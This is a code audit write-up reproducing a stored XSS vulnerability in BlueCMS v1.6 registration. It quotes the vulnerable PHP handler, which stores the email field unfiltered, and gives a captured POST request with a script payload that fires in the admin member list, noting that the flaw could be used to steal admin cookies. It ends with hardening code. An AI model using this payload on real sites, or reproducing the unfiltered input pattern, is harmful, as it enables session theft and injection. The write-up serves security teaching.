Code audit: xss vulnerability recurrence of bluecms user registration

BlueCMS

BlueCMS is a solution focused on building local portal websites. It is developed on PHP and MySQL, and all of its source code is open.
The version reproduced here is BlueCMS v1.6, which you can download yourself.

Code audit

This time we do not need Seay to dig for the XSS vulnerability; we audit for it by testing key functions.
In the backend (Member management -> Member list) the administrator can view member information. If XSS code can be inserted into this information from the frontend, the administrator's cookie can be stolen.

On the frontend member registration page, try to register a user: the user name, email address and password are all user-controlled.

Submit the registration and capture the request for closer analysis. You can see that the do_reg action of user.php is used.

Looking at the code, the user name has a length limit, but the email address is not filtered at all and is inserted directly into the SQL statement, so our XSS code can be placed in the email field.

elseif($act == 'do_reg'){
    // Registration fields are read straight from POST; only trim() is applied.
    $user_name = !empty($_POST['user_name']) ? trim($_POST['user_name']) : '';
    $pwd       = !empty($_POST['pwd']) ? trim($_POST['pwd']) : '';
    $pwd1      = !empty($_POST['pwd1']) ? trim($_POST['pwd1']) : '';
    $email     = !empty($_POST['email']) ? trim($_POST['email']) : '';
    $safecode  = !empty($_POST['safecode']) ? trim($_POST['safecode']) : '';
    $from = !empty($from) ? base64_decode($from) : 'user.php';

    // Only the user name is length-checked; the email address is never validated.
    if(strlen($user_name) < 4 || strlen($user_name) > 16){
        showmsg('User name character length does not match');
    }
    if(strlen($pwd) < 6){
        showmsg('Password cannot be less than 6 characters');
    }
    if($pwd != $pwd1){
        showmsg('The two passwords are inconsistent');
    }
    if(strtolower($safecode) != strtolower($_SESSION['safecode'])){
        showmsg('Verification code error');
    }
    if($db->getone("SELECT * FROM ".table('user')." WHERE user_name='$user_name'")){
        showmsg('The user name already exists');
    }
    if($db->getone("SELECT * FROM ".table('admin')." WHERE admin_name='$user_name'")){
        showmsg('The user name already exists');
    }
    // $email is interpolated into the SQL string unfiltered, so whatever the
    // user submitted is stored as-is and later rendered in the admin member list.
    $sql = "INSERT INTO ".table('user')." (user_id, user_name, pwd, email, reg_time, last_login_time) VALUES ('', '$user_name', md5('$pwd'), '$email', '$timestamp', '$timestamp')";
    if(!$db->query($sql)){
        showmsg('Sorry, there was an error in the registration');
    }else{
        $_SESSION['user_id'] = $db->insert_id();
        $_SESSION['user_name'] = $user_name;
        update_user_info($_SESSION['user_name']);
        setcookie('BLUE[user_id]', $_SESSION['user_id'], time()+3600, $cookiepath, $cookiedomain);
        setcookie('BLUE[user_name]', $user_name, time()+3600, $cookiepath, $cookiedomain);
        setcookie('BLUE[user_pwd]', md5(md5($pwd).$_CFG['cookie_hash']), time()+3600, $cookiepath, $cookiedomain);
        // Optional UCenter integration: synchronise the new account if UC_API is configured.
        if(defined('UC_API') && @include_once(BLUE_ROOT.'uc_client/client.php'))
        {
            $uid = uc_user_register($user_name, $pwd, $email);
            if($uid <= 0)
            {
                if($uid == -1)
                {
                    showmsg('Illegal user name!');
                }
                elseif($uid == -2)
                {
                    showmsg('Contains words that are not allowed to be registered!');
                }
                elseif($uid == -3)
                {
                    showmsg('The user name you specified '.$user_name.' already exists, please use a different user name!');
                }
                elseif($uid == -4)
                {
                    showmsg('The Email you used has an invalid format!');
                }
                elseif($uid == -5)
                {
                    showmsg('The Email you used is not allowed to register!');
                }
                else
                {
                    showmsg('Registration failed!');
                }
            }
            else
            {
                $ucsynlogin = uc_user_synlogin($uid);
                echo $ucsynlogin;
            }
        }
        $_SESSION['last_reg'] = $timestamp;
        showmsg('Congratulations on your successful registration, now redirecting...', $from);
    }
}

Vulnerability reproduction

The frontend has JavaScript that checks the email address is valid, so we enter a correct email address, capture the request and modify it.

referer=&user_name=xss123&pwd=123456&pwd1=123456&email=haha%40qq.com<script>alert(1)</script>&safecode=rc4d&from=&act=do_reg

You can see that the registration succeeds. Log in as the xss123 user and the alert pops up immediately.

Log in to the backend as administrator and view the member list: the alert pops up there too, confirming that the XSS code was stored successfully.
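For comparison, here is an added example (not BlueCMS code) of how the do_reg email handling could be hardened on both sides: validate the address server side, bind it as a parameter instead of interpolating it into the INSERT, and HTML-encode stored fields when the member list renders them. It assumes a PDO connection $pdo and a placeholder table name blue_user in place of table('user').

```php
<?php
// Added example, not part of BlueCMS. Assumes a PDO connection $pdo and the
// placeholder table name 'blue_user' (stands in for table('user')).

// Server-side validation: the frontend JavaScript check is bypassed simply by
// editing the captured request, so it must be repeated here.
function validate_email(string $email): ?string {
    $email = trim($email);
    // filter_var rejects anything that is not a syntactically valid address,
    // including an address with HTML appended to it.
    if (strlen($email) > 100 || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    return $email;
}

function register_user(PDO $pdo, string $user_name, string $pwd, string $email, int $timestamp): int {
    $clean_email = validate_email($email);
    if ($clean_email === null) {
        throw new InvalidArgumentException('Invalid email format');
    }
    // Parameterised INSERT: values are bound, never concatenated into the SQL text.
    $stmt = $pdo->prepare(
        'INSERT INTO blue_user (user_name, pwd, email, reg_time, last_login_time)
         VALUES (:user_name, :pwd, :email, :reg_time, :last_login)'
    );
    $stmt->execute([
        ':user_name'  => $user_name,
        ':pwd'        => password_hash($pwd, PASSWORD_DEFAULT), // instead of md5()
        ':email'      => $clean_email,
        ':reg_time'   => $timestamp,
        ':last_login' => $timestamp,
    ]);
    return (int) $pdo->lastInsertId();
}

// Output-side defence for the admin member list: encode every stored field
// before it is placed in HTML, so any stored markup is shown as text.
function render_member_row(array $row): string {
    $e = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<tr><td>' . $e($row['user_name']) . '</td><td>' . $e($row['email']) . '</td></tr>';
}

// Constructed sample input (the payload from the capture above); no database needed here.
$submitted = 'haha@qq.com<script>alert(1)</script>';
var_dump(validate_email($submitted));
echo render_member_row(['user_name' => 'xss123', 'email' => $submitted]);
```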


Posted on Mon, 16 Mar 2020 05:42:54 -0400 by ajna